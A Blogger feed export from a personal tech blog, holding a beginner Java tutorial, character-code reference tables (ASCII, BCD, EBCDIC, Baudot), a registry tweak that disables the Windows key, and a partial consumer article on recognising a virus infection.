tag:blogger.com,1999:blog-40442124089508253452024-03-06T12:08:55.885+07:00It's My BlogIm not pro just willing to shareAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.comBlogger55125tag:blogger.com,1999:blog-4044212408950825345.post-38690152251013128002011-10-22T15:10:00.000+07:002011-10-22T15:10:41.050+07:00Belajar Java-1 "Hello World"<blockquote><span class="Apple-style-span" style="background-color: #d9ead3;">Nah pada kesempatan ini saya ingin membagikan ilmu saya dalam hal pemrograman java, bukannya saya sudah mahir lalu membagikan ilmu, tapi saya juga masih belajar jadi sama-sama belajar yah...</span></blockquote>Pada kesempatan ini saya akan membahas pemrograman Java untuk pemula karena saya pun masih pemula hehe :D.<br />
Mari kita lihat source code nya...<br />
<blockquote><pre class="prettyprint lang-java">public class TaufikRFirdaus{
public static void main(String[] args) {
System.out.println("Welcome to Java Programming Taufik R Firdaus !!!");
}
}<span class="Apple-style-span" style="font-family: 'Times New Roman';"><span class="Apple-style-span" style="white-space: normal;">
</span></span></pre></blockquote><br />
Kode di atas akan menampilkan sebuah out put yaitu :<br />
<blockquote><span class="Apple-style-span" style="background-color: #d9ead3;">Welcome to Java Programming Taufik R Firdaus !!!</span></blockquote><br />
Sekarang saatnya penjelasan :<br />
<blockquote><pre class="prettyprint lang-html">public class TaufikRFirdaus <span class="Apple-style-span" style="font-family: 'Times New Roman'; white-space: normal;">{</span></pre></blockquote>Kode di atas digunakan untuk mendefinisikan class publik yang bernama TaufikRFirdaus.<br />
Tata cara penulisan class :<br />
<br />
<ol><li>Huruf awal dari nama class di sarankan menggunakan huruf Kapital(Huruf Besar"ABCDEF").</li>
<li>Diwajibkan menggunakan Huruf(Char"ABCDEF") untuk di awal kata.</li>
<li>Tidak boleh menggunakan numerik untuk awal dari nama class.</li>
<li>Tidak boleh menggunakan spasi(" "), untuk penggunaan spasi bisa diganti dengan Under Line("_")</li>
<li>Dalam nama class tidak boleh menggunakan karakter titik, koma, petik, maupun kutip(" . ", " , ", " ' ", " " ").</li>
</ol>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-86554661466771074012011-03-25T14:50:00.000+07:002011-03-25T15:18:03.754+07:00Kode ASCII, BCD, BCDIC, EBCDIC, BAUDOT<div style="text-align: justify;"><span style="font-size: large;"><b>ASCII Kode </b></span><br />
Kode Standar Amerika untuk Pertukaran Informasi atau ASCII (American Standard Code for Information Interchange) merupakan suatu standar internasional dalam kode huruf dan simbol seperti Hex dan Unicode tetapi ASCII lebih bersifat universal, contohnya 124 adalah untuk karakter "|". Ia selalu digunakan oleh komputer dan alat komunikasi lain untuk menunjukkan teks. Kode ASCII sebenarnya memiliki komposisi bilangan biner sebanyak 8 bit. Dimulai dari 0000 0000 hingga 1111 1111. Total kombinasi yang dihasilkan sebanyak 256, dimulai dari kode 0 hingga 255 dalam sistem bilangan Desimal.</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmN5wypW7vM-YocnitOEzk1iXagGQeGFAShhl9Mk0orG_0VPCbABpEKB5pHU2-Le2KN954EAnTN_pkt-tl1dTmLmOqWfwC88Paj5Zpo6McO1KkKlENpOM76-XWFn-WYQVY11UnU7u4zDc/s1600/asciicode.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmN5wypW7vM-YocnitOEzk1iXagGQeGFAShhl9Mk0orG_0VPCbABpEKB5pHU2-Le2KN954EAnTN_pkt-tl1dTmLmOqWfwC88Paj5Zpo6McO1KkKlENpOM76-XWFn-WYQVY11UnU7u4zDc/s400/asciicode.jpg" width="291" /></a></div><span style="font-size: large;"><b>BCD Kode</b></span><br />
<div align="justify"><b>Binary Coded Decimal</b> (BCD or "8421" BCD) numbers are made up using just 4 data bits (a nibble or half a byte) similar to the <em><a href="http://www.electronics-tutorials.ws/binary/bin_3.html">Hexadecimal</a></em> numbers we saw in the binary tutorial, but unlike hexadecimal numbers that range in full from <span class="ntxt">0</span> through to <span class="ntxt">F</span>, BCD numbers only range from <span class="ntxt">0</span> to <span class="ntxt">9</span>, with the binary number patterns of <span class="ntxt">1010</span> through to <span class="ntxt">1111</span> (<span class="ntxt">A</span> to <span class="ntxt">F</span>) being invalid inputs for this type of display and so are not used as shown below.</div><table align="center" bgcolor="#f1f1f1" border="0" cellpadding="0" cellspacing="0" style="width: 510px;"><tbody>
<tr><td width="240"> <table align="center" bgcolor="#ffffe0" border="1" cellpadding="0" cellspacing="0" class="ntxt" style="width: 250px;"><tbody>
<tr align="center" bgcolor="#d3e0ea"> <td rowspan="2">Decimal</td> <td colspan="4">Binary Pattern</td> <td rowspan="2">BCD</td></tr>
<tr align="center" bgcolor="#d3e0ea"> <td class="mtxt">8</td> <td class="mtxt">4</td> <td class="mtxt">2</td> <td class="mtxt">1</td></tr>
<tr align="center"> <td width="60">0</td> <td width="35">0</td> <td width="35">0</td> <td width="35">0</td> <td width="35">0</td> <td width="50">0</td></tr>
<tr align="center"><td>1</td><td>0</td><td>0</td><td>0</td><td>1</td><td>1</td></tr>
<tr align="center"><td>2</td><td>0</td><td>0</td><td>1</td><td>0</td><td>2</td></tr>
<tr align="center"><td>3</td><td>0</td><td>0</td><td>1</td><td>1</td><td>3</td></tr>
<tr align="center"><td>4</td><td>0</td><td>1</td><td>0</td><td>0</td><td>4</td></tr>
<tr align="center"><td>5</td><td>0</td><td>1</td><td>0</td><td>1</td><td>5</td></tr>
<tr align="center"><td>6</td><td>0</td><td>1</td><td>1</td><td>0</td><td>6</td></tr>
<tr align="center"><td>7</td><td>0</td><td>1</td><td>1</td><td>1</td><td>7</td></tr>
</tbody></table></td> <td rowspan="8" width="10"> </td> <td width="240"> <table align="center" bgcolor="#ffffe0" border="1" cellpadding="0" cellspacing="0" class="ntxt" style="width: 250px;"><tbody>
<tr align="center" bgcolor="#d3e0ea"> <td rowspan="2">Decimal</td> <td colspan="4">Binary Pattern</td> <td rowspan="2">BCD</td></tr>
<tr align="center" bgcolor="#d3e0ea"> <td class="mtxt">8</td> <td class="mtxt">4</td> <td class="mtxt">2</td> <td class="mtxt">1</td></tr>
<tr align="center"> <td width="60">8</td> <td width="35">1</td> <td width="35">0</td> <td width="35">0</td> <td width="35">0</td> <td width="50">8</td></tr>
<tr align="center"><td>9</td><td>1</td><td>0</td><td>0</td><td>1</td><td>9</td></tr>
<tr align="center"><td>10</td><td>1</td><td>0</td><td>1</td><td>0</td><td>Invalid</td></tr>
<tr align="center"><td>11</td><td>1</td><td>0</td><td>1</td><td>1</td><td>Invalid</td></tr>
<tr align="center"><td>12</td><td>1</td><td>1</td><td>0</td><td>0</td><td>Invalid</td></tr>
<tr align="center"><td>13</td><td>1</td><td>1</td><td>0</td><td>1</td><td>Invalid</td></tr>
<tr align="center"><td>14</td><td>1</td><td>1</td><td>1</td><td>0</td><td>Invalid</td></tr>
<tr align="center"><td>15</td><td>1</td><td>1</td><td>1</td><td>1</td><td>Invalid</td></tr>
</tbody></table></td></tr>
</tbody></table><h2 class="htxt">BCD to 7-Segment Display Decoders</h2><div align="justify">A binary coded decimal (BCD) to 7-segment display decoder such as the TTL 74LS47 or 74LS48, have 4 BCD inputs and 7 output lines, one for each LED segment. This allows a smaller 4-bit binary number (half a byte) to be used to display all the denary numbers from <span class="ntxt">0</span> to <span class="ntxt">9</span> and by adding two displays together, a full range of numbers from <span class="ntxt">00</span> to <span class="ntxt">99</span> can be displayed with just a single byte of 8 data bits.</div><h3 class="h3txt">BCD to 7-Segment Decoder</h3><table align="center" bgcolor="#fafafa" border="0" cellpadding="0" cellspacing="0" style="width: 430px;"><tbody>
<tr align="center"><td><img alt="BCD to 7-segment Decoder" border="0" height="209" src="http://www.electronics-tutorials.ws/combination/comb16.gif" width="424" /> </td></tr>
</tbody></table><div align="justify">The use of <b>packed</b> BCD allows two BCD digits to be stored within a single byte (8-bits) of data, allowing a single data byte to hold a BCD number in the range of <span class="ntxt">00</span> to <span class="ntxt">99</span>.</div><div align="left">An example of the 4-bit BCD input (<span class="ntxt">0100</span>) representing the number <span class="ntxt">4</span> is given below.</div><h3 class="h3txt">Example No1</h3><table align="center" bgcolor="#fafafa" border="0" cellpadding="0" cellspacing="0" style="width: 530px;"><tbody>
<tr><td><img alt="BCD Decoder Circuit" border="0" height="341" src="http://www.electronics-tutorials.ws/combination/comb17.gif" width="530" /></td></tr>
</tbody></table><div align="justify">In practice current limiting resistors of about 150Ω to 220Ω would be connected in series between the decoder/driver chip and each LED display segment to limit the maximum current flow. Different display decoders or drivers are available for the different types of display available, e.g. 74LS48 for common-cathode LED types, 74LS47 for common-anode LED types, or the CMOS CD4543 for liquid crystal display (LCD) types.</div><div align="justify">Liquid crystal displays (LCD´s) have one major advantage over similar LED types in that they consume much less power and nowadays, both LCD and LED displays are combined together to form larger Dot-Matrix Alphanumeric type displays which can show letters and characters as well as numbers in standard Red or Tri-colour outputs.</div><br />
<span style="font-size: large;"><b>BCDIC Kode</b></span><br />
<h1 style="font-weight: normal;"> </h1><span style="font-size: large;"><b>EBCDIC Kode</b></span><span style="font-size: large;"> </span><br />
<span style="font-size: large;"><span style="font-size: small;">ASCII is not the only format in use out there. IBM adopted EBCDIC (Extended Binary Coded Decimal Interchange Code) developed for punched cards in the early 1960s and still uses it on mainframes today. It is probably the next most well known character set due to the proliferation of IBM mainframes. It comes in at least six slightly differing forms, so again here is the most common.</span><b> </b></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmT9p9Wj72KG4e_3hWgAGezup2m3jAkt6nTqECHQiR4FjU0IhlfpHEbQFisY0P-20bD02QmZ_LB9TwZLHpLFJzgG6zovmOVABYRdpvKgdWJACl5IbWxmE81h4_edWmnBkr60Ia6r9-TXA/s1600/extend.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwioe7x0w89LrGKhaR-K7LUYvHpNYiVxSe_8YZvRFy8Tcz_BpPjh4YVLh-gRnNzXI3zr5HA3LNEohfJv38LEQxZwwuh07u-b7b6sCPvIGLezlS8xCP0hYmQAVUGYgnj6pTSNGYxxTeoE/s1600/ebcdic.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwioe7x0w89LrGKhaR-K7LUYvHpNYiVxSe_8YZvRFy8Tcz_BpPjh4YVLh-gRnNzXI3zr5HA3LNEohfJv38LEQxZwwuh07u-b7b6sCPvIGLezlS8xCP0hYmQAVUGYgnj6pTSNGYxxTeoE/s400/ebcdic.gif" width="273" /></a></div><br />
<span style="font-size: large;"><b>BAUDOT Kode</b></span><br />
<div class="c2" style="text-align: justify;">This table presents a programmer's quick reference to the "Baudot" character set.</div><div> </div><div style="text-align: justify;">IMPORTANT NOTE: The code presented here is with reference to usage in the computer industry. The original, true, baudot code differs from that presented below. The following table presents CCITT Alphabet No 2 which was developed from Murray's code which was in turn developed from Baudot's code. Baudot's code was replaced by Murray's code in 1901. And ITA2 replaced both by the early 1930's, so virtually all "teletype" equipment made in the U.S. uses ITA2 or the U.S. national version of the code.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">The 'baudot' code has been used extensively in telegraph systems. It is a five bit code invented by the Frenchman Emile Baudot in 1870. Using five bits allowed 32 different characters. To accomodate all the letters of the alphabet and numerals, two of the 32 combinations were used to select alternate character sets. The figures column is valid after a figures shift character has been received. It remains in effect until a letters shift is received, after which the letters column should be referred to (and vice-versa).</div><div style="text-align: justify;"> </div><div style="text-align: justify;">Two 'Baudot codes' are in common useage. The first as used in America. The second, used in Europe, is also termed the CCITT Alphabet No. 2. In each, the 'letters' are identical, but the 'figures' differ.</div><div style="text-align: justify;"> </div><div style="text-align: justify;">The five-bit words are bracketed by a start bit (space) and a stop bit (mark). Idling is shown by the 'marking' state. Words are transmitted LSB first.</div><table border="1" style="width: 470px;"><tbody>
<tr> <td bgcolor="#c0c0c0" valign="top" width="39"> <div class="c3"> Binary </div></td> <td bgcolor="#c0c0c0" valign="top" width="48"> <div class="c3"> Decimal </div></td> <td bgcolor="#c0c0c0" valign="top" width="26"> <div class="c3"> Hex </div></td> <td bgcolor="#c0c0c0" valign="top" width="30"> <div class="c3"> Octal </div></td> <td bgcolor="#c0c0c0" valign="top" width="48"> <div class="c4"> Letter </div></td> <td bgcolor="#c0c0c0" valign="top" width="48"> <div class="c4"> U.S.<br />
Figures </div></td> <td bgcolor="#c0c0c0" valign="top" width="48"> <div class="c4"> CCITT No.2<br />
Figures </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00000 </div></td> <td valign="top" width="48"> <div class="c1"> 0 </div></td> <td valign="top" width="26"> <div class="c1"> 0 </div></td> <td valign="top" width="30"> <div class="c1"> 0 </div></td> <td valign="top" width="48"> <div class="c1"> N/A </div></td> <td valign="top" width="48"> <div class="c1"> N/A </div></td> <td valign="top" width="48"> <div class="c1"> N/A </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00001 </div></td> <td valign="top" width="48"> <div class="c1"> 1 </div></td> <td valign="top" width="26"> <div class="c1"> 1 </div></td> <td valign="top" width="30"> <div class="c1"> 1 </div></td> <td valign="top" width="48"> <div class="c1"> E </div></td> <td valign="top" width="48"> <div class="c1"> 3 </div></td> <td valign="top" width="48"> <div class="c1"> 3 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00010 </div></td> <td valign="top" width="48"> <div class="c1"> 2 </div></td> <td valign="top" width="26"> <div class="c1"> 2 </div></td> <td valign="top" width="30"> <div class="c1"> 2 </div></td> <td valign="top" width="48"> <div class="c1"> LF </div></td> <td valign="top" width="48"> <div class="c1"> LF </div></td> <td valign="top" width="48"> <div class="c1"> LF </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00011 </div></td> <td valign="top" width="48"> <div class="c1"> 3 </div></td> <td valign="top" width="26"> <div class="c1"> 3 </div></td> <td valign="top" width="30"> <div class="c1"> 3 </div></td> <td valign="top" width="48"> <div class="c1"> A </div></td> <td valign="top" width="48"> <div class="c1"> - </div></td> <td valign="top" width="48"> <div class="c1"> - </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00100 </div></td> <td valign="top" width="48"> <div class="c1"> 4 </div></td> <td valign="top" width="26"> <div class="c1"> 4 </div></td> <td valign="top" width="30"> <div class="c1"> 4 </div></td> <td valign="top" width="48"> <div class="c1"> Space </div></td> <td valign="top" width="48"> <div class="c1"> Space </div></td> <td valign="top" width="48"> <div class="c1"> Space </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00101 </div></td> <td valign="top" width="48"> <div class="c1"> 5 </div></td> <td valign="top" width="26"> <div class="c1"> 5 </div></td> <td valign="top" width="30"> <div class="c1"> 5 </div></td> <td valign="top" width="48"> <div class="c1"> S </div></td> <td valign="top" width="48"> <div class="c1"> BELL </div></td> <td valign="top" width="48"> <div class="c1"> ' </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00110 </div></td> <td valign="top" width="48"> <div class="c1"> 6 </div></td> <td valign="top" width="26"> <div class="c1"> 6 </div></td> <td valign="top" width="30"> <div class="c1"> 6 </div></td> <td valign="top" width="48"> <div class="c1"> I </div></td> <td valign="top" width="48"> <div class="c1"> 8 </div></td> <td valign="top" width="48"> <div class="c1"> 8 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 00111 </div></td> <td valign="top" width="48"> <div class="c1"> 7 </div></td> <td valign="top" width="26"> <div class="c1"> 7 </div></td> <td valign="top" width="30"> <div class="c1"> 7 </div></td> <td valign="top" width="48"> <div class="c1"> U </div></td> <td valign="top" width="48"> <div class="c1"> 7 </div></td> <td valign="top" width="48"> <div class="c1"> 7 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01000 </div></td> <td valign="top" width="48"> <div class="c1"> 8 </div></td> <td valign="top" width="26"> <div class="c1"> 8 </div></td> <td valign="top" width="30"> <div class="c1"> 10 </div></td> <td valign="top" width="48"> <div class="c1"> CR </div></td> <td valign="top" width="48"> <div class="c1"> CR </div></td> <td valign="top" width="48"> <div class="c1"> CR </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01001 </div></td> <td valign="top" width="48"> <div class="c1"> 9 </div></td> <td valign="top" width="26"> <div class="c1"> 9 </div></td> <td valign="top" width="30"> <div class="c1"> 11 </div></td> <td valign="top" width="48"> <div class="c1"> D </div></td> <td valign="top" width="48"> <div class="c1"> $ </div></td> <td valign="top" width="48"> <div class="c1"> WRU </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01010 </div></td> <td valign="top" width="48"> <div class="c1"> 10 </div></td> <td valign="top" width="26"> <div class="c1"> A </div></td> <td valign="top" width="30"> <div class="c1"> 12 </div></td> <td valign="top" width="48"> <div class="c1"> R </div></td> <td valign="top" width="48"> <div class="c1"> 4 </div></td> <td valign="top" width="48"> <div class="c1"> 4 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01011 </div></td> <td valign="top" width="48"> <div class="c1"> 11 </div></td> <td valign="top" width="26"> <div class="c1"> B </div></td> <td valign="top" width="30"> <div class="c1"> 13 </div></td> <td valign="top" width="48"> <div class="c1"> J </div></td> <td valign="top" width="48"> <div class="c1"> ' </div></td> <td valign="top" width="48"> <div class="c1"> Bell </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01100 </div></td> <td valign="top" width="48"> <div class="c1"> 12 </div></td> <td valign="top" width="26"> <div class="c1"> C </div></td> <td valign="top" width="30"> <div class="c1"> 14 </div></td> <td valign="top" width="48"> <div class="c1"> N </div></td> <td valign="top" width="48"> <div class="c1"> , </div></td> <td valign="top" width="48"> <div class="c1"> , </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01101 </div></td> <td valign="top" width="48"> <div class="c1"> 13 </div></td> <td valign="top" width="26"> <div class="c1"> D </div></td> <td valign="top" width="30"> <div class="c1"> 15 </div></td> <td valign="top" width="48"> <div class="c1"> F </div></td> <td valign="top" width="48"> <div class="c1"> ! </div></td> <td valign="top" width="48"> <div class="c1"> ! </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01110 </div></td> <td valign="top" width="48"> <div class="c1"> 14 </div></td> <td valign="top" width="26"> <div class="c1"> E </div></td> <td valign="top" width="30"> <div class="c1"> 16 </div></td> <td valign="top" width="48"> <div class="c1"> C </div></td> <td valign="top" width="48"> <div class="c1"> : </div></td> <td valign="top" width="48"> <div class="c1"> : </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 01111 </div></td> <td valign="top" width="48"> <div class="c1"> 15 </div></td> <td valign="top" width="26"> <div class="c1"> F </div></td> <td valign="top" width="30"> <div class="c1"> 17 </div></td> <td valign="top" width="48"> <div class="c1"> K </div></td> <td valign="top" width="48"> <div class="c1"> ( </div></td> <td valign="top" width="48"> <div class="c1"> ( </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10000 </div></td> <td valign="top" width="48"> <div class="c1"> 16 </div></td> <td valign="top" width="26"> <div class="c1"> 10 </div></td> <td valign="top" width="30"> <div class="c1"> 20 </div></td> <td valign="top" width="48"> <div class="c1"> T </div></td> <td valign="top" width="48"> <div class="c1"> 5 </div></td> <td valign="top" width="48"> <div class="c1"> 5 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10001 </div></td> <td valign="top" width="48"> <div class="c1"> 17 </div></td> <td valign="top" width="26"> <div class="c1"> 11 </div></td> <td valign="top" width="30"> <div class="c1"> 21 </div></td> <td valign="top" width="48"> <div class="c1"> Z </div></td> <td valign="top" width="48"> <div class="c1"> " </div></td> <td valign="top" width="48"> <div class="c1"> + </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10010 </div></td> <td valign="top" width="48"> <div class="c1"> 18 </div></td> <td valign="top" width="26"> <div class="c1"> 12 </div></td> <td valign="top" width="30"> <div class="c1"> 22 </div></td> <td valign="top" width="48"> <div class="c1"> L </div></td> <td valign="top" width="48"> <div class="c1"> ) </div></td> <td valign="top" width="48"> <div class="c1"> ) </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10011 </div></td> <td valign="top" width="48"> <div class="c1"> 19 </div></td> <td valign="top" width="26"> <div class="c1"> 13 </div></td> <td valign="top" width="30"> <div class="c1"> 23 </div></td> <td valign="top" width="48"> <div class="c1"> W </div></td> <td valign="top" width="48"> <div class="c1"> 2 </div></td> <td valign="top" width="48"> <div class="c1"> 2 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10100 </div></td> <td valign="top" width="48"> <div class="c1"> 20 </div></td> <td valign="top" width="26"> <div class="c1"> 14 </div></td> <td valign="top" width="30"> <div class="c1"> 24 </div></td> <td valign="top" width="48"> <div class="c1"> H </div></td> <td valign="top" width="48"> <div class="c1"> # </div></td> <td valign="top" width="48"> <div class="c1"> £ </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10101 </div></td> <td valign="top" width="48"> <div class="c1"> 21 </div></td> <td valign="top" width="26"> <div class="c1"> 15 </div></td> <td valign="top" width="30"> <div class="c1"> 25 </div></td> <td valign="top" width="48"> <div class="c1"> Y </div></td> <td valign="top" width="48"> <div class="c1"> 6 </div></td> <td valign="top" width="48"> <div class="c1"> 6 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10110 </div></td> <td valign="top" width="48"> <div class="c1"> 22 </div></td> <td valign="top" width="26"> <div class="c1"> 16 </div></td> <td valign="top" width="30"> <div class="c1"> 26 </div></td> <td valign="top" width="48"> <div class="c1"> P </div></td> <td valign="top" width="48"> <div class="c1"> 0 </div></td> <td valign="top" width="48"> <div class="c1"> 0 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 10111 </div></td> <td valign="top" width="48"> <div class="c1"> 23 </div></td> <td valign="top" width="26"> <div class="c1"> 17 </div></td> <td valign="top" width="30"> <div class="c1"> 27 </div></td> <td valign="top" width="48"> <div class="c1"> Q </div></td> <td valign="top" width="48"> <div class="c1"> 1 </div></td> <td valign="top" width="48"> <div class="c1"> 1 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11000 </div></td> <td valign="top" width="48"> <div class="c1"> 24 </div></td> <td valign="top" width="26"> <div class="c1"> 18 </div></td> <td valign="top" width="30"> <div class="c1"> 30 </div></td> <td valign="top" width="48"> <div class="c1"> O </div></td> <td valign="top" width="48"> <div class="c1"> 9 </div></td> <td valign="top" width="48"> <div class="c1"> 9 </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11001 </div></td> <td valign="top" width="48"> <div class="c1"> 25 </div></td> <td valign="top" width="26"> <div class="c1"> 19 </div></td> <td valign="top" width="30"> <div class="c1"> 31 </div></td> <td valign="top" width="48"> <div class="c1"> B </div></td> <td valign="top" width="48"> <div class="c1"> ? </div></td> <td valign="top" width="48"> <div class="c1"> ? </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11010 </div></td> <td valign="top" width="48"> <div class="c1"> 26 </div></td> <td valign="top" width="26"> <div class="c1"> 1A </div></td> <td valign="top" width="30"> <div class="c1"> 32 </div></td> <td valign="top" width="48"> <div class="c1"> G </div></td> <td valign="top" width="48"> <div class="c1"> & </div></td> <td valign="top" width="48"> <div class="c1"> & </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11011 </div></td> <td valign="top" width="48"> <div class="c1"> 27 </div></td> <td valign="top" width="26"> <div class="c1"> 1B </div></td> <td valign="top" width="30"> <div class="c1"> 33 </div></td> <td valign="top" width="48"> <div class="c1"> Figures Shift </div></td> <td valign="top" width="48"> <div class="c1"> Figures Shift </div></td> <td valign="top" width="48"> <div class="c1"> Figures Shift </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11100 </div></td> <td valign="top" width="48"> <div class="c1"> 28 </div></td> <td valign="top" width="26"> <div class="c1"> 1C </div></td> <td valign="top" width="30"> <div class="c1"> 34 </div></td> <td valign="top" width="48"> <div class="c1"> M </div></td> <td valign="top" width="48"> <div class="c1"> . </div></td> <td valign="top" width="48"> <div class="c1"> . </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11101 </div></td> <td valign="top" width="48"> <div class="c1"> 29 </div></td> <td valign="top" width="26"> <div class="c1"> 1D </div></td> <td valign="top" width="30"> <div class="c1"> 35 </div></td> <td valign="top" width="48"> <div class="c1"> X </div></td> <td valign="top" width="48"> <div class="c1"> / </div></td> <td valign="top" width="48"> <div class="c1"> / </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11110 </div></td> <td valign="top" width="48"> <div class="c1"> 30 </div></td> <td valign="top" width="26"> <div class="c1"> 1E </div></td> <td valign="top" width="30"> <div class="c1"> 36 </div></td> <td valign="top" width="48"> <div class="c1"> V </div></td> <td valign="top" width="48"> <div class="c1"> ; </div></td> <td valign="top" width="48"> <div class="c1"> = </div></td> </tr>
<tr> <td valign="top" width="39"> <div class="c1"> 11111 </div></td> <td valign="top" width="48"> <div class="c1"> 31 </div></td> <td valign="top" width="26"> <div class="c1"> 1F </div></td> <td valign="top" width="30"> <div class="c1"> 37 </div></td> <td valign="top" width="48"> <div class="c1"> Letters Shift </div></td> <td valign="top" width="48"> <div class="c1"> Letters Shift </div></td> <td valign="top" width="48"> <div class="c1"> Letters Shift </div></td></tr>
</tbody></table>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-34375883908503799402011-03-23T15:35:00.001+07:002011-03-23T15:35:54.481+07:00Disable Windows Logo Keyi was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!<br />
<br />
CODE<br />
http://support.microsoft.com/?kbid=181348<br />
<br />
<br />
or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..<br />
<br />
Windows Registry Editor Version 5.00<br />
<br />
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]<br />
"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\<br />
00,00,00,00Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-89922272847008394432011-03-23T15:34:00.001+07:002011-03-23T15:34:35.728+07:00Caught a VirusIf you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.<br />
<br />
<br />
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.<br />
<br />
You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.<br />
<br />
It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.<br />
<br />
For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."<br />
<br />
Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.<br />
<br />
Is Your PC "Owned?"<br />
<br />
I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?<br />
<br />
Other indicators that may, in fact, indicate that there's nothing that you need to worry about, include:<br />
<br />
* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.<br />
* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.<br />
<br />
I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.<br />
<br />
Sniffing Out an Infection<br />
<br />
There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.<br />
<br />
To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.<br />
<br />
